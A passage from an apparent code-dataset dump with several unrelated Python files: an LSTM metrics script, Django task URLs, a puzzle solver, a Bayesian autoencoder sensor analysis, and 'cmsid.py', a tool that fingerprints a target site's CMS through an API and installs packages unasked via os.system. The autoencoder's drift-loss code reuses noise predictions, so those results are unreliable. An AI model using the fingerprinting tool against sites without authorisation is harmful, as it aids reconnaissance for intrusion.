fp)\r\n\t\tif tp + fn == 0:\r\n\t\t\trecall = 0\r\n\t\telse:\r\n\t\t\trecall = tp / (tp + fn)\r\n\t\tif precision + recall == 0:\r\n\t\t\tfeature1 = 0\r\n\t\telse:\r\n\t\t\tfeature1 = 2 * precision * recall / (precision + recall)\r\n\t\tp.append(precision)\r\n\t\tr.append(recall)\r\n\t\tf1.append(feature1)\r\n\r\n\t\ttp_sum += tp\r\n\t\tfp_sum += fp\r\n\t\tfn_sum += fn\r\n\r\n\tfor i in range(len(labels)):\r\n\t\tprint(labels[i], p[i], r[i], f1[i])\r\n\t# p = [precision for precision in p if precision != 0]\r\n\t# r = [recall for recall in r if recall != 0]\r\n\t# f1 = [feature1 for feature1 in f1 if feature1 != 0]\r\n\tprint('marco', np.mean(p), np.mean(r), np.mean(f1))\r\n\tp_micro = tp_sum / (tp_sum + fp_sum)\r\n\tr_micro = tp_sum / (tp_sum + fn_sum)\r\n\tf1_micro = 2 * p_micro * r_micro / (p_micro + r_micro)\r\n\tprint('micro', p_micro, r_micro, f1_micro)\r\n\treturn p, r, f1\r\n\r\n\r\nif __name__ == '__main__':\r\n\t# split_data()\r\n\t#\r\n\tmodel, data = get_model(is_train=True)\r\n\t# model, data = get_model(is_train=False)\r\n\ttrain_x, train_y, test_x, test_y = data\r\n\ttest_model(model, test_x, test_y)\r\n\r\n\t# train_x, train_y, test_x, test_y = load_data()\r\n\t# train_y = [l.index(1) for l in train_y.tolist()]\r\n\t# test_y = [l.index(1) for l in test_y.tolist()]\r\n\t# cnt = [0 for i in labels]\r\n\t# for l in train_y:\r\n\t# \tcnt[l] += 1\r\n\t# cnt2 = [0 for i in labels]\r\n\t# for l in test_y:\r\n\t# \tcnt2[l] += 1\r\n\t# s = [a / (a + b) for a, b in zip(cnt2, cnt)]\r\n\t# print(cnt)\r\n\t# print(cnt2)\r\n\t# print(s)\r\n\r\n","repo_name":"zouyishan/code","sub_path":"LSTM RNN/medical.py","file_name":"medical.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41345362851","text":"from django.contrib import admin\nfrom django.contrib.auth.views import LogoutView\nfrom django.urls import path\nfrom tasks.models import Task\nfrom tasks.views import (\n GenericAllTaskView,\n GenericCompletedTaskView,\n GenericTaskCompleteView,\n GenericTaskCreateView,\n GenericTaskDeleteView,\n GenericTaskDetailView,\n GenericTaskUpdateView,\n GenericTaskView,\n UserCreateView,\n UserLoginView,\n session_storage_view,\n)\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"tasks/\", GenericTaskView.as_view()),\n path(\"create-task/\", GenericTaskCreateView.as_view()),\n path(\"delete-task//\", GenericTaskDeleteView.as_view()),\n path(\"complete_task//\", GenericTaskCompleteView.as_view()),\n path(\"completed_tasks/\", GenericCompletedTaskView.as_view()),\n path(\"all_tasks/\", GenericAllTaskView.as_view()),\n path(\"update-task/\", GenericTaskUpdateView.as_view()),\n path(\"detail-task/\", GenericTaskDetailView.as_view()),\n path(\"sessiontest\", session_storage_view),\n path(\"user/signup\", UserCreateView.as_view()),\n path(\"user/login\", UserLoginView.as_view()),\n path(\"user/logout\", LogoutView.as_view()),\n]\n","repo_name":"noel-jose/GDC-Level-6-Milestone","sub_path":"task_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2582809862","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\n\nimport time\nfrom datetime import datetime\nimport requests\nimport json\nimport argparse\nimport sys\nimport platform\nimport shutil\nimport os\nimport random\n\n\nbanner_font = '''\n\n Author : Dxvistxr\n CMS Identificator With API => \\033[1;96mhttps://whatcms.org\\033[00m\n 2019\n\n '''\n\ndef check_platform():\n if 'Linux' not in platform.platform():\n sys.exit('[*] Linux Required !')\n\ndef check_python_version():\n version_py = sys.version[0]\n if '3' not in version_py:\n print(banner_font)\n sys.exit('\\033[1;91m[*] Please Run cmsid.py with python3')\n\ndef check_internet():\n try:\n print('[*] Checking Internet Connection...')\n check_internet = requests.get('https://www.google.com')\n print('[*] Internet : \\033[1;92mFound !')\n\n except Exception as error_internet:\n print('[*] Internet Not \\033[1;91mFound !')\n sys.exit('\\033[1;91m[!] Exiting')\n\n\ndef send_requests(key,target):\n try:\n check_internet()\n r = requests.get('https://whatcms.org/APIEndpoint/Detect?key=%s&url=%s' % (key,target))\n content_requests = r.text\n obj = json.loads(content_requests)\n req = obj['request']\n req_web = obj['request_web']\n code = obj['result']['code']\n msg = obj['result']['msg']\n id = obj['result']['id']\n name = obj['result']['name']\n confidence = obj['result']['confidence']\n cms_url = obj['result']['cms_url']\n t = datetime.now().strftime('%H:%M:%S')\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;96m Requests Sent At \\033[1;92m%s\\033[00m' % (t))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;93mRequests SuccessFull !\\033[00m')\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mRequest : \\033[1;96m%s' % (req))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mRequests Web : \\033[1;96m%s' % (req_web))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mStatus Code : \\033[1;96m%s' % (code))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mCMS Status : \\033[1;96m%s' % (msg))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mID Status : \\033[1;96m%s' % (id))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mCMS Name : \\033[1;96m%s' % (name))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mConfidence : \\033[1;96m%s' % (confidence))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mCMS URL : \\033[1;96m%s\\033[00m' % (cms_url))\n\n except Exception as error_send_requests:\n print(error_send_requests)\n\n\ndef banner_show():\n try:\n check_cowsay = shutil.which('cowsay')\n if check_cowsay ==None:\n print('\\033[1;91m[!] Cowsay Not Found !')\n os.system('apt update && apt install cowsay -y')\n os.system('cowsay CMS ID V1.0 By Dxvistxr')\n else:\n theme1 = 'cowsay CMS ID v1.0'\n theme2 = 'cowsay -f eyes CMS ID v1.0'\n theme3 = 'cowsay -f tux CMS ID v1.0'\n theme4 = 'cowsay -f bud-frogs CMS ID v1.0'\n choice_banner = [theme1,theme2,theme3,theme4]\n random_choice_banner = random.choice(choice_banner)\n if random_choice_banner ==theme1:\n os.system(random_choice_banner)\n print(banner_font)\n\n elif random_choice_banner ==theme2:\n os.system(random_choice_banner)\n print(banner_font)\n\n elif random_choice_banner ==theme3:\n os.system(random_choice_banner)\n print(banner_font)\n\n elif random_choice_banner ==theme4:\n os.system(random_choice_banner)\n print(banner_font)\n\n except Exception as error_banner:\n print(error_banner)\n\n\ndef main():\n check_platform()\n check_python_version()\n banner_show()\n parser = argparse.ArgumentParser()\n parser.add_argument('key',type=str,help='Set API Key')\n parser.add_argument('url',type=str,help='Set Target Url')\n args = parser.parse_args()\n send_requests(args.key,args.url)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HiFeV/Train-2018-2020","sub_path":"CMSID/cmsid.py","file_name":"cmsid.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40450337975","text":"from collections import deque\ndx,dy=(-1,1,0,0),(0,0,-1,1)\n\ndef bfs(i,j,val):\n visit = [[0] * n for _ in range(n)]\n q=deque()\n q.append((i,j))\n visit[i][j]=1\n group=[(i,j)]\n while q:\n x,y = q.popleft()\n for dir in range(4):\n nx,ny=x+dx[dir], y+dy[dir]\n if 0<=nx 0:\n tmpGroup,tmpX,tmpY,tmpRainbowCnt = bfs(i,j,maps[i][j])\n if tmpGroup == -1:\n continue\n if len(tmpGroup) > len(blockGroup):\n blockGroup,stX,stY,rainbowCnt = tmpGroup,tmpX,tmpY,tmpRainbowCnt\n elif len(tmpGroup) == len(blockGroup):\n if tmpRainbowCnt > rainbowCnt:\n blockGroup, stX, stY, rainbowCnt = tmpGroup, tmpX, tmpY, tmpRainbowCnt\n elif tmpRainbowCnt == rainbowCnt:\n if tmpX > stX:\n blockGroup, stX, stY, rainbowCnt = tmpGroup, tmpX, tmpY, tmpRainbowCnt\n elif tmpX == stX:\n if tmpY > stY:\n blockGroup, stX, stY, rainbowCnt = tmpGroup, tmpX, tmpY, tmpRainbowCnt\n if len(blockGroup)==0:\n break\n result+=len(blockGroup)**2\n for x,y in blockGroup:\n maps[x][y]=-2\n gravity()\n rotate()\n gravity()\n\nprint(result)","repo_name":"jihyeong2/TIL","sub_path":"baekjoon/Code/상어중학교_21609.py","file_name":"상어중학교_21609.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72695270187","text":"from sklearn.preprocessing import MinMaxScaler, RobustScaler, StandardScaler\nfrom bnn.ensembles_bnn import BAE_Ensemble_Manager\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom bnn.multiscaler import MultiScaler\nimport copy\nfrom bnn.seed import bae_set_seed\nfrom mpl_toolkits.mplot3d import Axes3D\nimport torch\n\nbae_set_seed(100)\n\n#LOAD DATA\ntotal_sensors = 17\nsensor_names = [\"ts1\",\"ts2\",\"ts3\",\"ts4\",\"vs1\",\"se\",\"ce\",\"cp\"]+[\"fs1\",\"fs2\"]+[\"ps1\",\"ps2\",\"ps3\",\"ps4\",\"ps5\",\"ps6\",\"eps1\"]\npickle_path=\"pickles/\"\ndata_raw = pickle.load(open(pickle_path+\"data_ft_resampled.p\", \"rb\" ) )\nx_train, x_test, x_ood, x_test_noise,x_test_drift, = data_raw['x_train'], data_raw['x_test'], data_raw['x_ood'], data_raw['x_test_noise'], data_raw['x_test_drift']\ny_train, y_test, y_ood = data_raw['y_train'], data_raw['y_test'], data_raw['y_ood']\n\ndef flatten_dimensions(np_array):\n return np_array.reshape(np_array.shape[0],-1)\n\ndef nested_list_apply(x_list, apply_func, *args, **kwargs):\n x_list_result = []\n for sensor_data in x_list:\n temp_data = []\n for noise_data in sensor_data:\n temp_data.append(apply_func(noise_data, *args, **kwargs))\n x_list_result.append(temp_data)\n return x_list_result\n\n#normalise data\nscaler_class = MultiScaler\nscaler = scaler_class(scaler_class=StandardScaler)\nx_train = scaler.fit_transform(x_train)\nx_test = scaler.transform(x_test)\nx_ood = scaler.transform(x_ood)\n\nx_test_noise = nested_list_apply(x_test_noise, scaler.transform)\nx_test_drift = nested_list_apply(x_test_drift, scaler.transform)\n\n#reshape to flatten last two dimensions to fit bnn\nx_train = x_train.reshape(x_train.shape[0],-1)\nx_test = x_test.reshape(x_test.shape[0],-1)\nx_ood = x_ood.reshape(x_ood.shape[0],-1)\nx_test_noise = nested_list_apply(x_test_noise, flatten_dimensions)\nx_test_drift = nested_list_apply(x_test_drift, flatten_dimensions)\n\n#define model\noptimiser = \"Adam\"\nnum_epoch_mu = 100 #10000 #1000\narchitecture_mu = [500,250,3,250,500]\narchitecture_sig_diag_cov=architecture_mu\nlr = 0.0008\nnum_samples = 10\nuse_cuda = torch.cuda.is_available()\n\n#diag_cov & combined mode\nmodel_name = \"diag_cov\"\nbae_model = BAE_Ensemble_Manager(architecture=architecture_mu, num_samples=num_samples,\n num_epoch=num_epoch_mu, learning_rate=lr, bottleneck_layer=2,\n task=\"regression\", optimiser=optimiser, mode=\"diag_cov\", use_cuda=use_cuda)\n\n#fit model\nbae_model.fit(x_train)\n\n#predictions\nresult_test = bae_model.predict(x_test, mode=model_name)\nresult_ood = bae_model.predict(x_ood, mode=model_name)\nresult_noise = nested_list_apply(x_test_noise, bae_model.predict, mode=model_name)\nresult_drift = nested_list_apply(x_test_drift, bae_model.predict, mode=model_name)\nresult_test_mu = bae_model.predict(x_test, mode=\"mu\")\nresult_ood_mu = bae_model.predict(x_ood, mode=\"mu\")\nresult_noise_mu = nested_list_apply(x_test_noise, bae_model.predict, mode=\"mu\")\nresult_drift_mu = nested_list_apply(x_test_drift, bae_model.predict, mode=\"mu\")\n\n#compute more accurate epistemic unc.\ndef unc_scale(result,seq_len=60,num_sens=17):\n raw_y_pred=result['raw'][0]\n scaled_raw_y_pred = []\n raw_y_cov=result['raw'][1]\n scaled_raw_y_cov = []\n for i in range(len(raw_y_pred)):\n scaled_raw_y_pred.append(scaler.inverse_transform(raw_y_pred[i,:,:].reshape(-1,seq_len,num_sens)))\n scaled_raw_y_cov.append(scaler.inverse_variance((raw_y_cov[i,:,:]**0.5).reshape(-1,seq_len,num_sens)))\n scaled_raw_y_pred= np.array(scaled_raw_y_pred)\n scaled_raw_y_cov= np.array(scaled_raw_y_cov)\n epi_result = scaled_raw_y_pred.std(0)\n alea_result = scaled_raw_y_cov.mean(0)\n total_unc = epi_result+alea_result\n return epi_result, alea_result,total_unc\n\ndef alea_unc_scale(result,seq_len=60,num_sens=17):\n temp_res = copy.copy(result['y_cov'][0])\n temp_res= temp_res.reshape(-1,seq_len,num_sens)**0.5\n temp_res = scaler.inverse_variance(temp_res)\n return temp_res\n\ndef str_deci(number,num_deci=2):\n return (\"{0:.\"+str(num_deci)+\"f}\").format(round(number,num_deci))\n\n#plot reconstructed signal\nplot_sample_index = 100\nplot_sensor_index = 10\nseverity_index = 2\nn_resample = 60\n\ndef get_recon_signal(mode=\"noise\",plot_sample_index = 1,plot_sensor_index =12,n_resample = 60,severity_index = 0):\n # feature_sensor_indices = range((n_resample*plot_sensor_index),(n_resample*(1+plot_sensor_index)))\n if mode == \"noise\":\n recon_sig=scaler.inverse_transform(result_noise[plot_sensor_index][severity_index]['y_pred'][0].reshape(-1,n_resample,total_sensors))\n recon_sig_epi_unc,recon_sig_alea_unc,recon_sig_total_unc=unc_scale(result_noise[plot_sensor_index][severity_index])\n ori_sig = scaler.inverse_transform(x_test_noise[plot_sensor_index][severity_index].reshape(-1,n_resample,total_sensors))\n elif mode==\"drift\":\n recon_sig=scaler.inverse_transform(result_drift[plot_sensor_index][severity_index]['y_pred'][0].reshape(-1,n_resample,total_sensors))\n recon_sig_epi_unc,recon_sig_alea_unc,recon_sig_total_unc=unc_scale(result_drift[plot_sensor_index][severity_index])\n ori_sig = scaler.inverse_transform(x_test_drift[plot_sensor_index][severity_index].reshape(-1,n_resample,total_sensors))\n else:\n recon_sig=scaler.inverse_transform(result_ood['y_pred'][0].reshape(-1,n_resample,total_sensors))\n recon_sig_epi_unc,recon_sig_alea_unc,recon_sig_total_unc=unc_scale(result_ood)\n ori_sig = scaler.inverse_transform(x_ood.reshape(-1,n_resample,total_sensors))\n\n recon_loss = ((recon_sig - ori_sig)**2)\n\n plot_recon_sig = recon_sig[plot_sample_index,:,plot_sensor_index]\n plot_ori_sig = ori_sig[plot_sample_index,:,plot_sensor_index]\n plot_recon_loss = recon_loss[plot_sample_index,:,plot_sensor_index]\n epi_unc =recon_sig_epi_unc[plot_sample_index,:,plot_sensor_index]\n alea_unc =recon_sig_alea_unc[plot_sample_index,:,plot_sensor_index]\n total_unc = recon_sig_total_unc[plot_sample_index,:,plot_sensor_index]\n\n return {\"recon_sig\":plot_recon_sig,\n \"ori_sig\":plot_ori_sig,\n \"recon_loss\":plot_recon_loss,\n \"epi_unc\":epi_unc,\n \"alea_unc\":alea_unc,\n \"total_unc\":total_unc\n }\n\n#PLOT RECONSTRUCTED SIGNAL\nrecon_signal_test = get_recon_signal(plot_sample_index = plot_sample_index,plot_sensor_index =plot_sensor_index,severity_index=0)\nrecon_signal_noise = get_recon_signal(mode=\"noise\",plot_sample_index = plot_sample_index,plot_sensor_index =plot_sensor_index,severity_index=severity_index)\nrecon_signal_ood = get_recon_signal(mode=\"ood\",plot_sample_index = plot_sample_index,plot_sensor_index =plot_sensor_index)\nrecon_signal_drift = get_recon_signal(mode=\"drift\",plot_sample_index = plot_sample_index,plot_sensor_index =plot_sensor_index,severity_index=severity_index)\n\n\nfig, axes = plt.subplots(2,2, figsize=(5,5),dpi=250)\naxes = axes.reshape(-1)\nplot_titles = [\"a) Normal\", \"b) Cooler Condition (3%)\", \"c) Injected Noise (10%)\",\"d) Injected Drift (10%)\"]\nax_ids = np.arange(len(axes))\nfor ax_id,ax,recon_signal,plot_title in zip(ax_ids,axes,[recon_signal_test,recon_signal_ood,recon_signal_noise,recon_signal_drift],plot_titles):\n plot_recon_sig,plot_ori_sig,recon_loss,epi_unc,alea_unc,total_unc = recon_signal['recon_sig'],recon_signal['ori_sig'],recon_signal['recon_loss'],recon_signal['epi_unc'],recon_signal['alea_unc'],recon_signal['total_unc']\n ax.plot(plot_recon_sig)\n ax.plot(plot_ori_sig)\n ax.fill_between(range(n_resample), (plot_recon_sig+alea_unc), (plot_recon_sig-alea_unc),alpha=0.5,color='g')\n ax.fill_between(range(n_resample), (plot_recon_sig+epi_unc+alea_unc), (plot_recon_sig+alea_unc),alpha=0.5,color='r')\n ax.fill_between(range(n_resample), (plot_recon_sig-alea_unc), (plot_recon_sig-epi_unc-alea_unc),alpha=0.5,color='r')\n\n recon_loss_mean,epi_unc_mean, alea_unc_mean, total_unc_mean = recon_loss.mean(),epi_unc.mean(),alea_unc.mean(),epi_unc.mean()+alea_unc.mean()\n\n ax.legend([\"Reconstructed\",\"Measured\",\"Aleatoric\",\"Epistemic\"],prop={'size': 6})\n if ax_id == 2 or ax_id == 3:\n ax.set_xlabel(\"Time(s)\")\n if ax_id == 0 or ax_id == 2:\n ax.set_ylabel(\"Pressure (Bar)\")\n ax.set_title(plot_title,fontsize=8)\n ax.text(0.35, 0.95,'Loss:'+str_deci(recon_loss_mean,2), ha='center', va='center', transform=ax.transAxes,fontsize=6)\n\n#Reconstruction loss\ndef vanilla_recon_loss(x_test,result_mu):\n return ((result_mu['y_pred'][0]-x_test)**2).mean(1)\n\ndef get_nested_recon_loss(result,x_test):\n return [vanilla_recon_loss(x_test[id_],result[id_]) for id_, noise_data in enumerate(result)]\n\nrecon_test = vanilla_recon_loss(x_test,result_test_mu)\nrecon_ood = vanilla_recon_loss(x_ood,result_ood_mu)\nrecon_noise = []\nrecon_drift = []\n\nfor sensor_id,sensor_data in enumerate(result_noise_mu):\n temp_data_noise = []\n temp_data_drift = []\n for noise_id,noise_data in enumerate(sensor_data):\n temp_data_noise.append(vanilla_recon_loss(x_test_noise[sensor_id][noise_id],sensor_data[noise_id]))\n temp_data_drift.append(vanilla_recon_loss(x_test_drift[sensor_id][noise_id],sensor_data[noise_id]))\n recon_noise.append(temp_data_noise)\n recon_drift.append(temp_data_drift)\n\ndef mean_unc(result_data,seq_len=60,num_sens=17):\n epi,alea,total = unc_scale(result_data,seq_len=60,num_sens=17)\n epi = epi.reshape(-1,seq_len*num_sens)\n alea = alea.reshape(-1,seq_len*num_sens)\n total = total.reshape(-1,seq_len*num_sens)\n\n return epi.mean(1),alea.mean(1),total.mean(1)\n\nepi_test,alea_test,_ = mean_unc(result_test)\nepi_ood,alea_ood,_ = mean_unc(result_ood)\nunc_result_noise = nested_list_apply(result_noise,mean_unc)\nunc_result_drift = nested_list_apply(result_drift,mean_unc)\n\n#aleatoric uncertainty\ndef mean_alea_unc(batch_cov_mat,index_alea=0):\n \"\"\"\n For batch covariance matrix, extracts the diagonal and compute\n the mean by the last dimension (expected as the number of features)\n \"\"\"\n batch_cov_mat_y_cov = batch_cov_mat['y_cov'][index_alea]\n if len(batch_cov_mat_y_cov.shape) ==3:\n #extract diagonal of cov. matrix\n iii,jjj = np.diag_indices(batch_cov_mat_y_cov.shape[-1])\n alea_temp = batch_cov_mat_y_cov[...,iii,jjj]\n else:\n alea_temp = batch_cov_mat_y_cov\n alea_temp = (alea_temp**0.5).mean(-1)\n return alea_temp\n\n#argwhere to separate by severity of condition\nindex_target = 0\ncolumns_ood = np.unique(y_ood[:,index_target])\nindex_ood = []\n\nfor unique_condition in columns_ood:\n index_ood += [np.argwhere(y_ood[:,index_target] == unique_condition).reshape(-1)]\n\n#PLOTS FOR VARYING CONDITION\n# plot - recon loss\nshow_outliers = False\nrecon_loss_plot =[]\nrecon_loss_plot += [recon_test]\nfor i in index_ood:\n recon_loss_plot += [recon_ood[i]]\n\n# plot - epistemic uncertainty\nepi_unc_plot =[]\nepi_unc_plot += [epi_test]\nfor i in index_ood:\n epi_unc_plot += [epi_ood[i]]\n\n#plot - aleatoric uncertainty (diagonal cov)\nalea_unc_plot =[]\nalea_unc_plot += [alea_test]\nfor i in index_ood:\n alea_unc_plot += [alea_ood[i]]\n\nfigsize = (6,3)\ndpi = 250\nfig, (ax1,ax2,ax3) = plt.subplots(1,3,figsize=figsize,dpi=dpi)\n\nx_tick_labels_eff = ('100', '20', '3')\nax1.boxplot(recon_loss_plot,showfliers=show_outliers)\nax1.set_xticklabels( x_tick_labels_eff)\nax1.set_ylabel(\"Reconstruction loss\")\nax1.set_xlabel(\"Condition (%)\")\n\nax2.boxplot(epi_unc_plot,showfliers=show_outliers)\nax2.set_xticklabels(x_tick_labels_eff)\nax2.set_ylabel(\"Epistemic uncertainty\")\nax2.set_xlabel(\"Condition (%)\")\n\nax3.boxplot(alea_unc_plot,showfliers=show_outliers)\nax3.set_xticklabels(x_tick_labels_eff)\nax3.set_ylabel(\"Aleatoric uncertainty\")\nax3.set_xlabel(\"Condition (%)\")\n\nplt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\nplt.show()\nplt.tight_layout()\n\n#plot noise level\nnp_unc_result_noise = np.array(unc_result_noise)\nnp_unc_result_drift = np.array(unc_result_drift)\n\n\n#Plot single row for drifts\n#set plot sensor id here to show the sensitivity of metrics toward injected drifts\nfigsize = (6,3)\ndpi = 250\nfig, axes = plt.subplots(1,3,figsize=figsize,dpi=dpi)\nsensor_id = 10\n# x_tick_labels_eff = ('0', '1', '2', '3', '4', '5')\nx_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\naxes[0].boxplot(recon_drift[sensor_id],showfliers=show_outliers)\naxes[0].set_xticklabels(x_tick_labels_eff)\naxes[0].set_ylabel(\"Reconstruction loss\")\naxes[0].set_xlabel(\"Injected Drift (%)\")\n\naxes[1].boxplot(np_unc_result_drift[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\naxes[1].set_xticklabels(x_tick_labels_eff)\naxes[1].set_ylabel(\"Epistemic uncertainty\")\naxes[1].set_xlabel(\"Injected Drift (%)\")\n\naxes[2].boxplot(np_unc_result_drift[sensor_id,:,1,:].tolist(),showfliers=show_outliers)\naxes[2].set_xticklabels(x_tick_labels_eff)\naxes[2].set_ylabel(\"Aleatoric uncertainty\")\naxes[2].set_xlabel(\"Injected Drift (%)\")\nplt.show()\nplt.tight_layout()\n\n#Plot single row for noise\n#set plot sensor id here to show the sensitivity of metrics toward injected noise\n\nfig, axes = plt.subplots(1,3,figsize=figsize,dpi=dpi)\nsensor_id = 10\nx_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\naxes[0].boxplot(recon_noise[sensor_id],showfliers=show_outliers)\naxes[0].set_xticklabels(x_tick_labels_eff)\naxes[0].set_ylabel(\"Reconstruction loss\")\naxes[0].set_xlabel(\"Injected Noise (%)\")\n\naxes[1].boxplot(np_unc_result_noise[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\naxes[1].set_xticklabels(x_tick_labels_eff)\naxes[1].set_ylabel(\"Epistemic uncertainty\")\naxes[1].set_xlabel(\"Injected Noise (%)\")\n\naxes[2].boxplot(np_unc_result_noise[sensor_id,:,1,:].tolist(),showfliers=show_outliers)\naxes[2].set_xticklabels(x_tick_labels_eff)\naxes[2].set_ylabel(\"Aleatoric uncertainty\")\naxes[2].set_xlabel(\"Injected Noise (%)\")\nplt.show()\nplt.tight_layout()\n\n#plot cov. matrix\nif model_name == \"full_cov\":\n plot_sample_index = 20\n y_cov_mu_test = result_test['y_cov'][0][0]\n y_cov_mu_ood_0 = result_ood['y_cov'][0][index_ood[0][plot_sample_index]]\n y_cov_mu_ood_1 = result_ood['y_cov'][0][index_ood[1][plot_sample_index]]\n\n y_cov_list = [y_cov_mu_test,y_cov_mu_ood_0,y_cov_mu_ood_1]\n plot_name_list = [\"y_cov_mu_test\",\"y_cov_mu_ood_0\",\"y_cov_mu_ood_1\"]\n\n#plot for increasing noise\nif model_name == \"full_cov\":\n plot_sample_index = 0\n\n y_cov_mu_noise = [noise_data['y_cov'][0][0] for noise_data in result_noise]\n y_cov_mu_drift = [drift_data['y_cov'][0][0] for drift_data in result_drift]\n\n plot_name_noise_list = [str(i)+\"_Noise\" for i in range(len(y_cov_mu_noise))]\n plot_name_drift_list = [str(i)+\"_Drift\" for i in range(len(y_cov_mu_drift))]\n\n\n matrix_list = [y_cov_mu_test,y_cov_mu_ood_1,y_cov_mu_noise[-1],y_cov_mu_drift[-1]]\n vmin, vmax = np.array(matrix_list).min(),np.array(matrix_list).max()\n num_plots = len(matrix_list)\n\n fig, axes = plt.subplots(2,2)\n axes = axes.reshape(-1)\n sup_titles = [\"a) Healthy condition\",\"b) Near breakdown\",\"c) Injected Noise (5%)\",\"d) Injected Drift (5 bar)\"]\n for id_,cov_mat in enumerate(matrix_list):\n im = axes[id_].imshow(matrix_list[id_],cmap='viridis')\n axes[id_].set_title(sup_titles[id_])\n plt.colorbar(im, ax=axes[id_])\n\n#plot colored samples\nresult_plot = result_ood\nnum_colored_samples = 30\nindex_sample = np.arange(0,num_colored_samples)\n\nepi_sample = np.transpose(result_plot['y_pred'][1][index_sample])\nrecon_sample = np.transpose((result_plot['y_pred'][0][index_sample]-x_test_noise[1][0][index_sample])**1)\nrecon_sample = np.abs(recon_sample)\nalea_sample = np.transpose(result_plot['y_cov'][0][index_sample])\n\nnum_sensors = 17\nepi_sample_reshuffled = np.zeros((num_sensors,num_colored_samples))\nrecon_sample_reshuffled = np.zeros((num_sensors,num_colored_samples))\nalea_sample_reshuffled = np.zeros((num_sensors,num_colored_samples))\n\nfeature_sensor_index =np.arange(60)*17\nfeature_sensor_index_list = []\n\n#create index\nfor i in range(17):\n start_index = i*60\n end_index = (i+1)*60\n feature_sensor_index_list.append(copy.copy(feature_sensor_index)+i)\n epi_sample_reshuffled[i,:]=epi_sample[feature_sensor_index_list[-1],:].mean(0)\n recon_sample_reshuffled[i,:]=recon_sample[feature_sensor_index_list[-1],:].mean(0)\n alea_sample_reshuffled[i,:]=alea_sample[feature_sensor_index_list[-1],:].mean(0)\n\n#3D Coordinate plot\nfig = plt.figure(dpi=250)\nax = fig.add_subplot(111, projection='3d')\n\nmarker_alpha = 0.6\nmarker_size = 15\nz_scaler = 1e-3\nfor plot_ood_index in [0,1,2]:\n ax.scatter(recon_loss_plot[plot_ood_index], epi_unc_plot[plot_ood_index], alea_unc_plot[plot_ood_index]*z_scaler, alpha=marker_alpha, s=marker_size)\n\nlegend_list = [\"Healthy\", \"Cooler Cond. (20%)\", \"Cooler Cond. (5%)\"]\n\nfor plot_drift_level_index in [1,2,3,4]:\n ax.scatter(recon_drift[sensor_id][plot_drift_level_index], np_unc_result_drift[sensor_id,plot_drift_level_index,0,:], np_unc_result_drift[sensor_id,plot_drift_level_index,1,:]*z_scaler, marker='^', alpha=marker_alpha,s=marker_size)\n legend_list.append(\"Inj. Drift (\"+str(x_tick_labels_eff[plot_drift_level_index])+\"%)\")\n\nfor plot_noise_level_index in [1,2,3,4]:\n ax.scatter(recon_noise[sensor_id][plot_noise_level_index], np_unc_result_noise[sensor_id,plot_noise_level_index,0,:], np_unc_result_noise[sensor_id,plot_noise_level_index,1,:]*z_scaler, marker='x', alpha=marker_alpha,s=marker_size)\n legend_list.append(\"Inj. Noise (\"+str(x_tick_labels_eff[plot_noise_level_index])+\"%)\")\n\nax.set_xlabel('Reconstruction Loss')\nax.set_ylabel('Epistemic Uncertainty')\nax.set_zlabel('Aleatoric Uncertainty')\n\nax.legend(legend_list, prop={'size': 8})\nax.text2D(0.06, 0.81, '$\\\\times 10^{3}$', transform=ax.transAxes)\n\n#========Unsupervised clustering==========\n# unsupervised_data = []\n# unsupervised_labels_true = []\n# z_scaler = 1e-6\n# for plot_ood_index,label_index in zip([0,1,2],[0,1,2]):\n# real_drifts = np.array([recon_loss_plot[plot_ood_index],\n# epi_unc_plot[plot_ood_index],\n# alea_unc_plot[plot_ood_index]*z_scaler]\n# )\n# unsupervised_data.append(real_drifts)\n# unsupervised_labels_true.append(np.ones_like(recon_loss_plot[plot_ood_index]) * label_index)\n# for plot_drift_level_index,label_index in zip([1,2,3,4],[3,4,5,6]):\n# injected_drifts = np.array([recon_drift[sensor_id][plot_drift_level_index],\n# np_unc_result_drift[sensor_id,plot_drift_level_index,0,:],\n# np_unc_result_drift[sensor_id,plot_drift_level_index,1,:]*z_scaler])\n# unsupervised_data.append(injected_drifts)\n# unsupervised_labels_true.append(np.ones_like(recon_drift[sensor_id][plot_drift_level_index]) * label_index)\n# for plot_noise_level_index,label_index in zip([1,2,3,4],[7,8,9,10]):\n# injected_noise = np.array([recon_noise[sensor_id][plot_noise_level_index],\n# np_unc_result_noise[sensor_id,plot_noise_level_index,0,:],\n# np_unc_result_noise[sensor_id,plot_noise_level_index,1,:]*z_scaler])\n# unsupervised_data.append(injected_noise)\n# unsupervised_labels_true.append(np.ones_like(recon_noise[sensor_id][plot_noise_level_index]) * label_index)\n#\n#\n# unsupervised_data = np.concatenate(unsupervised_data,axis=1)\n# unsupervised_data = np.moveaxis(unsupervised_data, 0,1)\n# unsupervised_labels_true = 